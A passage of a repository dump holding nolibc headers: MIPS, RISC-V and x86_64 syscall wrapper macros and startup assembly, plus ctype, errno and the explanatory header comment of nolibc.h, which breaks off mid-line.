68 | */ 69 | 70 | #define my_syscall0(num) \ 71 | ({ \ 72 | register long _num __asm__ ("v0") = (num); \ 73 | register long _arg4 __asm__ ("a3"); \ 74 | \ 75 | __asm__ volatile ( \ 76 | "addiu $sp, $sp, -32\n" \ 77 | "syscall\n" \ 78 | "addiu $sp, $sp, 32\n" \ 79 | : "=r"(_num), "=r"(_arg4) \ 80 | : "r"(_num) \ 81 | : "memory", "cc", "at", "v1", "hi", "lo", \ 82 | "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", "t8", "t9" \ 83 | ); \ 84 | _arg4 ? -_num : _num; \ 85 | }) 86 | 87 | #define my_syscall1(num, arg1) \ 88 | ({ \ 89 | register long _num __asm__ ("v0") = (num); \ 90 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 91 | register long _arg4 __asm__ ("a3"); \ 92 | \ 93 | __asm__ volatile ( \ 94 | "addiu $sp, $sp, -32\n" \ 95 | "syscall\n" \ 96 | "addiu $sp, $sp, 32\n" \ 97 | : "=r"(_num), "=r"(_arg4) \ 98 | : "0"(_num), \ 99 | "r"(_arg1) \ 100 | : "memory", "cc", "at", "v1", "hi", "lo", \ 101 | "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", "t8", "t9" \ 102 | ); \ 103 | _arg4 ? -_num : _num; \ 104 | }) 105 | 106 | #define my_syscall2(num, arg1, arg2) \ 107 | ({ \ 108 | register long _num __asm__ ("v0") = (num); \ 109 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 110 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 111 | register long _arg4 __asm__ ("a3"); \ 112 | \ 113 | __asm__ volatile ( \ 114 | "addiu $sp, $sp, -32\n" \ 115 | "syscall\n" \ 116 | "addiu $sp, $sp, 32\n" \ 117 | : "=r"(_num), "=r"(_arg4) \ 118 | : "0"(_num), \ 119 | "r"(_arg1), "r"(_arg2) \ 120 | : "memory", "cc", "at", "v1", "hi", "lo", \ 121 | "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", "t8", "t9" \ 122 | ); \ 123 | _arg4 ? 
-_num : _num; \ 124 | }) 125 | 126 | #define my_syscall3(num, arg1, arg2, arg3) \ 127 | ({ \ 128 | register long _num __asm__ ("v0") = (num); \ 129 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 130 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 131 | register long _arg3 __asm__ ("a2") = (long)(arg3); \ 132 | register long _arg4 __asm__ ("a3"); \ 133 | \ 134 | __asm__ volatile ( \ 135 | "addiu $sp, $sp, -32\n" \ 136 | "syscall\n" \ 137 | "addiu $sp, $sp, 32\n" \ 138 | : "=r"(_num), "=r"(_arg4) \ 139 | : "0"(_num), \ 140 | "r"(_arg1), "r"(_arg2), "r"(_arg3) \ 141 | : "memory", "cc", "at", "v1", "hi", "lo", \ 142 | "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", "t8", "t9" \ 143 | ); \ 144 | _arg4 ? -_num : _num; \ 145 | }) 146 | 147 | #define my_syscall4(num, arg1, arg2, arg3, arg4) \ 148 | ({ \ 149 | register long _num __asm__ ("v0") = (num); \ 150 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 151 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 152 | register long _arg3 __asm__ ("a2") = (long)(arg3); \ 153 | register long _arg4 __asm__ ("a3") = (long)(arg4); \ 154 | \ 155 | __asm__ volatile ( \ 156 | "addiu $sp, $sp, -32\n" \ 157 | "syscall\n" \ 158 | "addiu $sp, $sp, 32\n" \ 159 | : "=r" (_num), "=r"(_arg4) \ 160 | : "0"(_num), \ 161 | "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4) \ 162 | : "memory", "cc", "at", "v1", "hi", "lo", \ 163 | "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", "t8", "t9" \ 164 | ); \ 165 | _arg4 ? 
-_num : _num; \ 166 | }) 167 | 168 | #define my_syscall5(num, arg1, arg2, arg3, arg4, arg5) \ 169 | ({ \ 170 | register long _num __asm__ ("v0") = (num); \ 171 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 172 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 173 | register long _arg3 __asm__ ("a2") = (long)(arg3); \ 174 | register long _arg4 __asm__ ("a3") = (long)(arg4); \ 175 | register long _arg5 = (long)(arg5); \ 176 | \ 177 | __asm__ volatile ( \ 178 | "addiu $sp, $sp, -32\n" \ 179 | "sw %7, 16($sp)\n" \ 180 | "syscall\n " \ 181 | "addiu $sp, $sp, 32\n" \ 182 | : "=r" (_num), "=r"(_arg4) \ 183 | : "0"(_num), \ 184 | "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5) \ 185 | : "memory", "cc", "at", "v1", "hi", "lo", \ 186 | "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", "t8", "t9" \ 187 | ); \ 188 | _arg4 ? -_num : _num; \ 189 | }) 190 | 191 | /* startup code, note that it's called __start on MIPS */ 192 | __asm__ (".section .text\n" 193 | ".weak __start\n" 194 | ".set nomips16\n" 195 | ".set push\n" 196 | ".set noreorder\n" 197 | ".option pic0\n" 198 | ".ent __start\n" 199 | "__start:\n" 200 | "lw $a0,($sp)\n" // argc was in the stack 201 | "addiu $a1, $sp, 4\n" // argv = sp + 4 202 | "sll $a2, $a0, 2\n" // a2 = argc * 4 203 | "add $a2, $a2, $a1\n" // envp = argv + 4*argc ... 204 | "addiu $a2, $a2, 4\n" // ... + 4 205 | "li $t0, -8\n" 206 | "and $sp, $sp, $t0\n" // sp must be 8-byte aligned 207 | "addiu $sp,$sp,-16\n" // the callee expects to save a0..a3 there! 208 | "jal main\n" // main() returns the status code, we'll exit with it. 
209 | "nop\n" // delayed slot 210 | "move $a0, $v0\n" // retrieve 32-bit exit code from v0 211 | "li $v0, 4001\n" // NR_exit == 4001 212 | "syscall\n" 213 | ".end __start\n" 214 | ".set pop\n" 215 | ""); 216 | 217 | #endif // _NOLIBC_ARCH_MIPS_H 218 | -------------------------------------------------------------------------------- /exp/nolibc/arch-riscv.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * RISCV (32 and 64) specific definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_ARCH_RISCV_H 8 | #define _NOLIBC_ARCH_RISCV_H 9 | 10 | /* O_* macros for fcntl/open are architecture-specific */ 11 | #define O_RDONLY 0 12 | #define O_WRONLY 1 13 | #define O_RDWR 2 14 | #define O_CREAT 0x40 15 | #define O_EXCL 0x80 16 | #define O_NOCTTY 0x100 17 | #define O_TRUNC 0x200 18 | #define O_APPEND 0x400 19 | #define O_NONBLOCK 0x800 20 | #define O_DIRECTORY 0x10000 21 | 22 | struct sys_stat_struct { 23 | unsigned long st_dev; /* Device. */ 24 | unsigned long st_ino; /* File serial number. */ 25 | unsigned int st_mode; /* File mode. */ 26 | unsigned int st_nlink; /* Link count. */ 27 | unsigned int st_uid; /* User ID of the file's owner. */ 28 | unsigned int st_gid; /* Group ID of the file's group. */ 29 | unsigned long st_rdev; /* Device number, if device. */ 30 | unsigned long __pad1; 31 | long st_size; /* Size of file, in bytes. */ 32 | int st_blksize; /* Optimal block size for I/O. */ 33 | int __pad2; 34 | long st_blocks; /* Number 512-byte blocks allocated. */ 35 | long st_atime; /* Time of last access. */ 36 | unsigned long st_atime_nsec; 37 | long st_mtime; /* Time of last modification. */ 38 | unsigned long st_mtime_nsec; 39 | long st_ctime; /* Time of last status change. 
*/ 40 | unsigned long st_ctime_nsec; 41 | unsigned int __unused4; 42 | unsigned int __unused5; 43 | }; 44 | 45 | #if __riscv_xlen == 64 46 | #define PTRLOG "3" 47 | #define SZREG "8" 48 | #elif __riscv_xlen == 32 49 | #define PTRLOG "2" 50 | #define SZREG "4" 51 | #endif 52 | 53 | /* Syscalls for RISCV : 54 | * - stack is 16-byte aligned 55 | * - syscall number is passed in a7 56 | * - arguments are in a0, a1, a2, a3, a4, a5 57 | * - the system call is performed by calling ecall 58 | * - syscall return comes in a0 59 | * - the arguments are cast to long and assigned into the target 60 | * registers which are then simply passed as registers to the asm code, 61 | * so that we don't have to experience issues with register constraints. 62 | * 63 | * On riscv, select() is not implemented so we have to use pselect6(). 64 | */ 65 | #define __ARCH_WANT_SYS_PSELECT6 66 | 67 | #define my_syscall0(num) \ 68 | ({ \ 69 | register long _num __asm__ ("a7") = (num); \ 70 | register long _arg1 __asm__ ("a0"); \ 71 | \ 72 | __asm__ volatile ( \ 73 | "ecall\n\t" \ 74 | : "=r"(_arg1) \ 75 | : "r"(_num) \ 76 | : "memory", "cc" \ 77 | ); \ 78 | _arg1; \ 79 | }) 80 | 81 | #define my_syscall1(num, arg1) \ 82 | ({ \ 83 | register long _num __asm__ ("a7") = (num); \ 84 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 85 | \ 86 | __asm__ volatile ( \ 87 | "ecall\n" \ 88 | : "+r"(_arg1) \ 89 | : "r"(_num) \ 90 | : "memory", "cc" \ 91 | ); \ 92 | _arg1; \ 93 | }) 94 | 95 | #define my_syscall2(num, arg1, arg2) \ 96 | ({ \ 97 | register long _num __asm__ ("a7") = (num); \ 98 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 99 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 100 | \ 101 | __asm__ volatile ( \ 102 | "ecall\n" \ 103 | : "+r"(_arg1) \ 104 | : "r"(_arg2), \ 105 | "r"(_num) \ 106 | : "memory", "cc" \ 107 | ); \ 108 | _arg1; \ 109 | }) 110 | 111 | #define my_syscall3(num, arg1, arg2, arg3) \ 112 | ({ \ 113 | register long _num __asm__ ("a7") = (num); \ 114 | register 
long _arg1 __asm__ ("a0") = (long)(arg1); \ 115 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 116 | register long _arg3 __asm__ ("a2") = (long)(arg3); \ 117 | \ 118 | __asm__ volatile ( \ 119 | "ecall\n\t" \ 120 | : "+r"(_arg1) \ 121 | : "r"(_arg2), "r"(_arg3), \ 122 | "r"(_num) \ 123 | : "memory", "cc" \ 124 | ); \ 125 | _arg1; \ 126 | }) 127 | 128 | #define my_syscall4(num, arg1, arg2, arg3, arg4) \ 129 | ({ \ 130 | register long _num __asm__ ("a7") = (num); \ 131 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 132 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 133 | register long _arg3 __asm__ ("a2") = (long)(arg3); \ 134 | register long _arg4 __asm__ ("a3") = (long)(arg4); \ 135 | \ 136 | __asm__ volatile ( \ 137 | "ecall\n" \ 138 | : "+r"(_arg1) \ 139 | : "r"(_arg2), "r"(_arg3), "r"(_arg4), \ 140 | "r"(_num) \ 141 | : "memory", "cc" \ 142 | ); \ 143 | _arg1; \ 144 | }) 145 | 146 | #define my_syscall5(num, arg1, arg2, arg3, arg4, arg5) \ 147 | ({ \ 148 | register long _num __asm__ ("a7") = (num); \ 149 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 150 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 151 | register long _arg3 __asm__ ("a2") = (long)(arg3); \ 152 | register long _arg4 __asm__ ("a3") = (long)(arg4); \ 153 | register long _arg5 __asm__ ("a4") = (long)(arg5); \ 154 | \ 155 | __asm__ volatile ( \ 156 | "ecall\n" \ 157 | : "+r"(_arg1) \ 158 | : "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5), \ 159 | "r"(_num) \ 160 | : "memory", "cc" \ 161 | ); \ 162 | _arg1; \ 163 | }) 164 | 165 | #define my_syscall6(num, arg1, arg2, arg3, arg4, arg5, arg6) \ 166 | ({ \ 167 | register long _num __asm__ ("a7") = (num); \ 168 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 169 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 170 | register long _arg3 __asm__ ("a2") = (long)(arg3); \ 171 | register long _arg4 __asm__ ("a3") = (long)(arg4); \ 172 | register long _arg5 __asm__ ("a4") = (long)(arg5); \ 173 | register long 
_arg6 __asm__ ("a5") = (long)(arg6); \ 174 | \ 175 | __asm__ volatile ( \ 176 | "ecall\n" \ 177 | : "+r"(_arg1) \ 178 | : "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5), "r"(_arg6), \ 179 | "r"(_num) \ 180 | : "memory", "cc" \ 181 | ); \ 182 | _arg1; \ 183 | }) 184 | 185 | /* startup code */ 186 | __asm__ (".section .text\n" 187 | ".weak _start\n" 188 | "_start:\n" 189 | ".option push\n" 190 | ".option norelax\n" 191 | "lla gp, __global_pointer$\n" 192 | ".option pop\n" 193 | "lw a0, 0(sp)\n" // argc (a0) was in the stack 194 | "add a1, sp, "SZREG"\n" // argv (a1) = sp 195 | "slli a2, a0, "PTRLOG"\n" // envp (a2) = SZREG*argc ... 196 | "add a2, a2, "SZREG"\n" // + SZREG (skip null) 197 | "add a2,a2,a1\n" // + argv 198 | "andi sp,a1,-16\n" // sp must be 16-byte aligned 199 | "call main\n" // main() returns the status code, we'll exit with it. 200 | "li a7, 93\n" // NR_exit == 93 201 | "ecall\n" 202 | ""); 203 | 204 | #endif // _NOLIBC_ARCH_RISCV_H 205 | -------------------------------------------------------------------------------- /exp/nolibc/arch-x86_64.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * x86_64 specific definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_ARCH_X86_64_H 8 | #define _NOLIBC_ARCH_X86_64_H 9 | 10 | /* O_* macros for fcntl/open are architecture-specific */ 11 | #define O_RDONLY 0 12 | #define O_WRONLY 1 13 | #define O_RDWR 2 14 | #define O_CREAT 0x40 15 | #define O_EXCL 0x80 16 | #define O_NOCTTY 0x100 17 | #define O_TRUNC 0x200 18 | #define O_APPEND 0x400 19 | #define O_NONBLOCK 0x800 20 | #define O_DIRECTORY 0x10000 21 | 22 | /* The struct returned by the stat() syscall, equivalent to stat64(). The 23 | * syscall returns 116 bytes and stops in the middle of __unused. 
24 | */ 25 | struct sys_stat_struct { 26 | unsigned long st_dev; 27 | unsigned long st_ino; 28 | unsigned long st_nlink; 29 | unsigned int st_mode; 30 | unsigned int st_uid; 31 | 32 | unsigned int st_gid; 33 | unsigned int __pad0; 34 | unsigned long st_rdev; 35 | long st_size; 36 | long st_blksize; 37 | 38 | long st_blocks; 39 | unsigned long st_atime; 40 | unsigned long st_atime_nsec; 41 | unsigned long st_mtime; 42 | 43 | unsigned long st_mtime_nsec; 44 | unsigned long st_ctime; 45 | unsigned long st_ctime_nsec; 46 | long __unused[3]; 47 | }; 48 | 49 | /* Syscalls for x86_64 : 50 | * - registers are 64-bit 51 | * - syscall number is passed in rax 52 | * - arguments are in rdi, rsi, rdx, r10, r8, r9 respectively 53 | * - the system call is performed by calling the syscall instruction 54 | * - syscall return comes in rax 55 | * - rcx and r11 are clobbered, others are preserved. 56 | * - the arguments are cast to long and assigned into the target registers 57 | * which are then simply passed as registers to the asm code, so that we 58 | * don't have to experience issues with register constraints. 59 | * - the syscall number is always specified last in order to allow to force 60 | * some registers before (gcc refuses a %-register at the last position). 61 | * - see also x86-64 ABI section A.2 AMD64 Linux Kernel Conventions, A.2.1 62 | * Calling Conventions. 
63 | * 64 | * Link x86-64 ABI: https://gitlab.com/x86-psABIs/x86-64-ABI/-/wikis/home 65 | * 66 | */ 67 | 68 | #define my_syscall0(num) \ 69 | ({ \ 70 | long _ret; \ 71 | register long _num __asm__ ("rax") = (num); \ 72 | \ 73 | __asm__ volatile ( \ 74 | "syscall\n" \ 75 | : "=a"(_ret) \ 76 | : "0"(_num) \ 77 | : "rcx", "r11", "memory", "cc" \ 78 | ); \ 79 | _ret; \ 80 | }) 81 | 82 | #define my_syscall1(num, arg1) \ 83 | ({ \ 84 | long _ret; \ 85 | register long _num __asm__ ("rax") = (num); \ 86 | register long _arg1 __asm__ ("rdi") = (long)(arg1); \ 87 | \ 88 | __asm__ volatile ( \ 89 | "syscall\n" \ 90 | : "=a"(_ret) \ 91 | : "r"(_arg1), \ 92 | "0"(_num) \ 93 | : "rcx", "r11", "memory", "cc" \ 94 | ); \ 95 | _ret; \ 96 | }) 97 | 98 | #define my_syscall2(num, arg1, arg2) \ 99 | ({ \ 100 | long _ret; \ 101 | register long _num __asm__ ("rax") = (num); \ 102 | register long _arg1 __asm__ ("rdi") = (long)(arg1); \ 103 | register long _arg2 __asm__ ("rsi") = (long)(arg2); \ 104 | \ 105 | __asm__ volatile ( \ 106 | "syscall\n" \ 107 | : "=a"(_ret) \ 108 | : "r"(_arg1), "r"(_arg2), \ 109 | "0"(_num) \ 110 | : "rcx", "r11", "memory", "cc" \ 111 | ); \ 112 | _ret; \ 113 | }) 114 | 115 | #define my_syscall3(num, arg1, arg2, arg3) \ 116 | ({ \ 117 | long _ret; \ 118 | register long _num __asm__ ("rax") = (num); \ 119 | register long _arg1 __asm__ ("rdi") = (long)(arg1); \ 120 | register long _arg2 __asm__ ("rsi") = (long)(arg2); \ 121 | register long _arg3 __asm__ ("rdx") = (long)(arg3); \ 122 | \ 123 | __asm__ volatile ( \ 124 | "syscall\n" \ 125 | : "=a"(_ret) \ 126 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), \ 127 | "0"(_num) \ 128 | : "rcx", "r11", "memory", "cc" \ 129 | ); \ 130 | _ret; \ 131 | }) 132 | 133 | #define my_syscall4(num, arg1, arg2, arg3, arg4) \ 134 | ({ \ 135 | long _ret; \ 136 | register long _num __asm__ ("rax") = (num); \ 137 | register long _arg1 __asm__ ("rdi") = (long)(arg1); \ 138 | register long _arg2 __asm__ ("rsi") = (long)(arg2); \ 139 | register 
long _arg3 __asm__ ("rdx") = (long)(arg3); \ 140 | register long _arg4 __asm__ ("r10") = (long)(arg4); \ 141 | \ 142 | __asm__ volatile ( \ 143 | "syscall\n" \ 144 | : "=a"(_ret) \ 145 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), \ 146 | "0"(_num) \ 147 | : "rcx", "r11", "memory", "cc" \ 148 | ); \ 149 | _ret; \ 150 | }) 151 | 152 | #define my_syscall5(num, arg1, arg2, arg3, arg4, arg5) \ 153 | ({ \ 154 | long _ret; \ 155 | register long _num __asm__ ("rax") = (num); \ 156 | register long _arg1 __asm__ ("rdi") = (long)(arg1); \ 157 | register long _arg2 __asm__ ("rsi") = (long)(arg2); \ 158 | register long _arg3 __asm__ ("rdx") = (long)(arg3); \ 159 | register long _arg4 __asm__ ("r10") = (long)(arg4); \ 160 | register long _arg5 __asm__ ("r8") = (long)(arg5); \ 161 | \ 162 | __asm__ volatile ( \ 163 | "syscall\n" \ 164 | : "=a"(_ret) \ 165 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5), \ 166 | "0"(_num) \ 167 | : "rcx", "r11", "memory", "cc" \ 168 | ); \ 169 | _ret; \ 170 | }) 171 | 172 | #define my_syscall6(num, arg1, arg2, arg3, arg4, arg5, arg6) \ 173 | ({ \ 174 | long _ret; \ 175 | register long _num __asm__ ("rax") = (num); \ 176 | register long _arg1 __asm__ ("rdi") = (long)(arg1); \ 177 | register long _arg2 __asm__ ("rsi") = (long)(arg2); \ 178 | register long _arg3 __asm__ ("rdx") = (long)(arg3); \ 179 | register long _arg4 __asm__ ("r10") = (long)(arg4); \ 180 | register long _arg5 __asm__ ("r8") = (long)(arg5); \ 181 | register long _arg6 __asm__ ("r9") = (long)(arg6); \ 182 | \ 183 | __asm__ volatile ( \ 184 | "syscall\n" \ 185 | : "=a"(_ret) \ 186 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5), \ 187 | "r"(_arg6), "0"(_num) \ 188 | : "rcx", "r11", "memory", "cc" \ 189 | ); \ 190 | _ret; \ 191 | }) 192 | 193 | /* startup code */ 194 | /* 195 | * x86-64 System V ABI mandates: 196 | * 1) %rsp must be 16-byte aligned right before the function call. 197 | * 2) The deepest stack frame should be zero (the %rbp). 
198 | * 199 | */ 200 | __asm__ (".section .text\n" 201 | ".weak _start\n" 202 | "_start:\n" 203 | "pop %rdi\n" // argc (first arg, %rdi) 204 | "mov %rsp, %rsi\n" // argv[] (second arg, %rsi) 205 | "lea 8(%rsi,%rdi,8),%rdx\n" // then a NULL then envp (third arg, %rdx) 206 | "xor %ebp, %ebp\n" // zero the stack frame 207 | "and $-16, %rsp\n" // x86-64 ABI: %rsp must be 16-byte aligned before call 208 | "call main\n" // main() returns the status code, we'll exit with it. 209 | "mov %eax, %edi\n" // retrieve exit code (32 bit) 210 | "mov $60, %eax\n" // NR_exit == 60 211 | "syscall\n" // really exit 212 | "hlt\n" // ensure it does not return 213 | ""); 214 | 215 | #endif // _NOLIBC_ARCH_X86_64_H 216 | -------------------------------------------------------------------------------- /exp/nolibc/arch.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * Copyright (C) 2017-2022 Willy Tarreau 4 | */ 5 | 6 | /* Below comes the architecture-specific code. For each architecture, we have 7 | * the syscall declarations and the _start code definition. This is the only 8 | * global part. On all architectures the kernel puts everything on the stack 9 | * before jumping to _start just above us, without any return address (_start 10 | * is not a function but an entry point). So at the stack pointer we find argc. 11 | * Then argv[] begins, and ends at the first NULL. Then we have envp which 12 | * starts and ends with a NULL as well. So envp=argv+argc+1.
13 | */ 14 | 15 | #ifndef _NOLIBC_ARCH_H 16 | #define _NOLIBC_ARCH_H 17 | 18 | #if defined(__x86_64__) 19 | #include "arch-x86_64.h" 20 | #elif defined(__i386__) || defined(__i486__) || defined(__i586__) || defined(__i686__) 21 | #include "arch-i386.h" 22 | #elif defined(__ARM_EABI__) 23 | #include "arch-arm.h" 24 | #elif defined(__aarch64__) 25 | #include "arch-aarch64.h" 26 | #elif defined(__mips__) && defined(_ABIO32) 27 | #include "arch-mips.h" 28 | #elif defined(__riscv) 29 | #include "arch-riscv.h" 30 | #endif 31 | 32 | #endif /* _NOLIBC_ARCH_H */ 33 | -------------------------------------------------------------------------------- /exp/nolibc/ctype.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * ctype function definitions for NOLIBC 4 | * Copyright (C) 2017-2021 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_CTYPE_H 8 | #define _NOLIBC_CTYPE_H 9 | 10 | #include "std.h" 11 | 12 | /* 13 | * As much as possible, please keep functions alphabetically sorted. 
14 | */ 15 | 16 | static __attribute__((unused)) 17 | int isascii(int c) 18 | { 19 | /* 0x00..0x7f */ 20 | return (unsigned int)c <= 0x7f; 21 | } 22 | 23 | static __attribute__((unused)) 24 | int isblank(int c) 25 | { 26 | return c == '\t' || c == ' '; 27 | } 28 | 29 | static __attribute__((unused)) 30 | int iscntrl(int c) 31 | { 32 | /* 0x00..0x1f, 0x7f */ 33 | return (unsigned int)c < 0x20 || c == 0x7f; 34 | } 35 | 36 | static __attribute__((unused)) 37 | int isdigit(int c) 38 | { 39 | return (unsigned int)(c - '0') < 10; 40 | } 41 | 42 | static __attribute__((unused)) 43 | int isgraph(int c) 44 | { 45 | /* 0x21..0x7e */ 46 | return (unsigned int)(c - 0x21) < 0x5e; 47 | } 48 | 49 | static __attribute__((unused)) 50 | int islower(int c) 51 | { 52 | return (unsigned int)(c - 'a') < 26; 53 | } 54 | 55 | static __attribute__((unused)) 56 | int isprint(int c) 57 | { 58 | /* 0x20..0x7e */ 59 | return (unsigned int)(c - 0x20) < 0x5f; 60 | } 61 | 62 | static __attribute__((unused)) 63 | int isspace(int c) 64 | { 65 | /* \t is 0x9, \n is 0xA, \v is 0xB, \f is 0xC, \r is 0xD */ 66 | return ((unsigned int)c == ' ') || (unsigned int)(c - 0x09) < 5; 67 | } 68 | 69 | static __attribute__((unused)) 70 | int isupper(int c) 71 | { 72 | return (unsigned int)(c - 'A') < 26; 73 | } 74 | 75 | static __attribute__((unused)) 76 | int isxdigit(int c) 77 | { 78 | return isdigit(c) || (unsigned int)(c - 'A') < 6 || (unsigned int)(c - 'a') < 6; 79 | } 80 | 81 | static __attribute__((unused)) 82 | int isalpha(int c) 83 | { 84 | return islower(c) || isupper(c); 85 | } 86 | 87 | static __attribute__((unused)) 88 | int isalnum(int c) 89 | { 90 | return isalpha(c) || isdigit(c); 91 | } 92 | 93 | static __attribute__((unused)) 94 | int ispunct(int c) 95 | { 96 | return isgraph(c) && !isalnum(c); 97 | } 98 | 99 | /* make sure to include all global symbols */ 100 | #include "nolibc.h" 101 | 102 | #endif /* _NOLIBC_CTYPE_H */ 103 | 
-------------------------------------------------------------------------------- /exp/nolibc/errno.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * Minimal errno definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_ERRNO_H 8 | #define _NOLIBC_ERRNO_H 9 | 10 | #include <asm/errno.h> 11 | 12 | /* this way it will be removed if unused */ 13 | static int errno; 14 | 15 | #ifndef NOLIBC_IGNORE_ERRNO 16 | #define SET_ERRNO(v) do { errno = (v); } while (0) 17 | #else 18 | #define SET_ERRNO(v) do { } while (0) 19 | #endif 20 | 21 | 22 | /* errno codes all ensure that they will not conflict with a valid pointer 23 | * because they all correspond to the highest addressable memory page. 24 | */ 25 | #define MAX_ERRNO 4095 26 | 27 | /* make sure to include all global symbols */ 28 | #include "nolibc.h" 29 | 30 | #endif /* _NOLIBC_ERRNO_H */ 31 | -------------------------------------------------------------------------------- /exp/nolibc/nolibc.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* nolibc.h 3 | * Copyright (C) 2017-2018 Willy Tarreau 4 | */ 5 | 6 | /* 7 | * This file is designed to be used as a libc alternative for minimal programs 8 | * with very limited requirements. It consists of a small number of syscall and 9 | * type definitions, and the minimal startup code needed to call main(). 10 | * All syscalls are declared as static functions so that they can be optimized 11 | * away by the compiler when not used. 12 | * 13 | * Syscalls are split into 3 levels: 14 | * - The lower level is the arch-specific syscall() definition, consisting of 15 | * assembly code in compound expressions. These are called my_syscall0() to 16 | * my_syscall6() depending on the number of arguments. The MIPS 17 | * implementation is limited to 5 arguments.
All input arguments are cast 18 | * to a long stored in a register. These expressions always return the 19 | * syscall's return value as a signed long value which is often either a 20 | * pointer or the negated errno value. 21 | * 22 | * - The second level is mostly architecture-independent. It is made of 23 | * static functions called sys_<name>() which rely on my_syscall<N>() 24 | * depending on the syscall definition. These functions are responsible 25 | * for exposing the appropriate types for the syscall arguments (int, 26 | * pointers, etc) and for setting the appropriate return type (often int). 27 | * A few of them are architecture-specific because the syscalls are not all 28 | * mapped exactly the same among architectures. For example, some archs do 29 | * not implement select() and need pselect6() instead, so the sys_select() 30 | * function will have to abstract this. 31 | * 32 | * - The third level is the libc call definition. It exposes the lower raw 33 | * sys_<name>() calls in a way that looks like what a libc usually does, 34 | * takes care of specific input values, and of setting errno upon error. 35 | * There can be minor variations compared to standard libc calls. For 36 | * example the open() call always takes 3 args here. 37 | * 38 | * The errno variable is declared static and unused. This way it can be 39 | * optimized away if not used. However this means that a program made of 40 | * multiple C files may observe different errno values (one per C file). For 41 | * the type of programs this project targets it usually is not a problem. The 42 | * resulting program may even be reduced by defining the NOLIBC_IGNORE_ERRNO 43 | * macro, in which case the errno value will never be assigned. 44 | * 45 | * Some stdint-like integer types are defined. These are valid on all currently 46 | * supported architectures, because signs are enforced, ints are assumed to be 47 | * 32 bits, longs the size of a pointer and long long 64 bits.
If more 48 | * architectures have to be supported, this may need to be adapted. 49 | * 50 | * Some macro definitions like the O_* values passed to open(), and some 51 | * structures like the sys_stat struct depend on the architecture. 52 | * 53 | * The definitions start with the architecture-specific parts, which are picked 54 | * based on what the compiler knows about the target architecture, and are 55 | * completed with the generic code. Since it is the compiler which sets the 56 | * target architecture, cross-compiling normally works out of the box without 57 | * having to specify anything. 58 | * 59 | * Finally some very common libc-level functions are provided. This is the case 60 | * for a few functions usually found in string.h, ctype.h, or stdlib.h. 61 | * 62 | * The nolibc.h file is only a convenient entry point which includes all other 63 | * files. It also defines the NOLIBC macro, so that it is possible for a 64 | * program to check this macro to know if it is being built against nolibc and 65 | * decide to disable some features or simply not to include some standard libc files.
66 | * 67 | * A simple static executable may be built this way: 68 | * $ gcc -fno-asynchronous-unwind-tables -fno-ident -s -Os -nostdlib \ 69 | * -static -include nolibc.h -o hello hello.c -lgcc 70 | * 71 | * Simple programs meant to be reasonably portable to various libcs and using 72 | * only a few common includes may also be built by simply making the include 73 | * path point to the nolibc directory: 74 | * $ gcc -fno-asynchronous-unwind-tables -fno-ident -s -Os -nostdlib \ 75 | * -I../nolibc -o hello hello.c -lgcc 76 | * 77 | * The available standard (but limited) include files are: 78 | * ctype.h, errno.h, signal.h, stdio.h, stdlib.h, string.h, time.h 79 | * 80 | * In addition, the following ones are expected to be provided by the compiler: 81 | * float.h, stdarg.h, stddef.h 82 | * 83 | * The following ones, which are part of the C standard, are not provided: 84 | * assert.h, locale.h, math.h, setjmp.h, limits.h 85 | * 86 | * A very useful calling convention table may be found here: 87 | * http://man7.org/linux/man-pages/man2/syscall.2.html 88 | * 89 | * This doc is quite convenient though not necessarily up to date: 90 | * https://w3challs.com/syscalls/ 91 | * 92 | */ 93 | #ifndef 